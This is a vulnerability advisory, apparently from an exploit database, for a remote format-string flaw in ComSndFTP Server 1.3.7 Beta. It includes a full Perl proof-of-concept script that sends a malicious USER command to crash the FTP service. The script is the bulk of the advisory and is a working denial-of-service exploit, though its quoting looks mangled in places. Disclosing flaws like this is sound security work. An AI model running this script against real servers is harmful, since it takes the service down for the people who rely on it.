ComSndFTP Server Remote Format String Overflow Exploit

Summary

ComSndFTP Server 1.3.7 Beta Remote Format String Overflow Vulnerability

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * ComSndFTP Server 1.3.7 Beta

Bug Description :
ComSndFTP Server is a free ftp server for windows.
It is possible for remote attackers to use USER command with any format string that will lead to a Denial Of Service flaw for the FTP service.

Proof Of Concept :
———————————————————–
#!/usr/bin/perl -w
#ComSndFTP Server Remote Format String Overflow Exploit
#Written by demonalex (at) 163 (dot) com [email concealed]
use IO::Socket;
$|=1;
$host=shift || die ‘$0 $host $portn’;
$port=shift || die ‘$0 $host $portn’;
$evil = ‘%s%p%x%d’;
print ‘Launch Attack … ‘;
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>’tcp’, Timeout=>30) || die ‘HOST $host PORT $port is down!n’;
if(defined($sock1)){
$sock1->recv($content, 100, 0);
sleep(2);
$sock1->send(‘USER ‘.$evil.’rn’, 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print ‘Finish!n’;
exit(1);

Disclosure Timeline:
Published: 2012-06-08

Categories: Exploits